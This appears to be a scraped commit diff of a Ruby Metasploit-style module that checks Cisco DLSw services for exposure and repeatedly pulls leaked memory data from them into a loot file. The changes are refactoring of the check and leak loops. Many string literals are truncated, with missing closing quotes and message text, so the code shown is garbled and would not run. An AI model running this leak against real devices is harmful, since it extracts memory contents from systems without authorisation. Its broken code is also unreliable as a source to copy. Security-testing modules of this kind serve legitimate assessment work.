@@ -43,7 +43,7 @@ def initialize
4343 end
4444
4545 def peer
46- peer = "#{ rhost } #{ rport }
46+ "#{ rhost } #{ rport }
4747 end
4848
4949 def get_response ( size = 8 )
@@ -54,13 +54,24 @@ def get_response(size = 8)
5454 end
5555
5656 # Called when using check
57- def check_host ( ip )
58- print_status ( "Checking #{ peer } )
57+ def check_host ( _ip )
58+ print_status ( "#{ peer } : Checking for DLSw exposure" )
5959 response = get_response
60-
61- dlsw_header = [ "3148015b" ] . pack ( "H*" ) # => "\x31\x48\x01\x5b""
62- if !response . blank? && ( response [ 0 ..3 ] == dlsw_header )
63- print_good ( "#{ peer } )
60+
61+ if response . blank?
62+ vprint_status ( "#{ peer } )
63+ Exploit ::CheckCode ::Safe
64+ elsif response [ 0 ..3 ] == "\x31 \x48 \x01 \x5b "
65+ vprint_good ( "#{ peer } )
66+ report_service (
67+ host : rhost ,
68+ port : rport ,
69+ proto : 'tcp' ,
70+ name : 'dlsw'
71+ )
72+ # TODO: check that response has something that truly indicates it is vulnerable
73+ # and not simply that it responded
74+ print_good ( "#{ peer } #{ response . length } )
6475 report_vuln (
6576 host : rhost ,
6677 port : rport ,
@@ -70,11 +81,7 @@ def check_host(ip)
7081 )
7182 Exploit ::CheckCode ::Vulnerable
7283 else
73- if response . blank?
74- vprint_status ( "#{ peer } )
75- else
76- vprint_status ( "#{ peer } #{ response . size } )
77- end
84+ vprint_status ( "#{ peer } #{ response . size } )
7885 Exploit ::CheckCode ::Safe
7986 end
8087 end
@@ -86,9 +93,7 @@ def run_host(ip)
8693 dlsw_data = ''
8794 until dlsw_data . length > datastore [ 'LEAK_AMOUNT' ]
8895 response = get_response ( 72 )
89- unless response . blank?
90- dlsw_data << response [ 18 ..72 ]
91- end
96+ dlsw_data << response [ 18 ..72 ] unless response . blank?
9297 end
9398 loot_and_report ( dlsw_data )
9499 end
@@ -105,4 +110,3 @@ def loot_and_report(dlsw_leak)
105110 print_status ( "#{ peer } #{ path } )
106111 end
107112end
108-
0 commit comments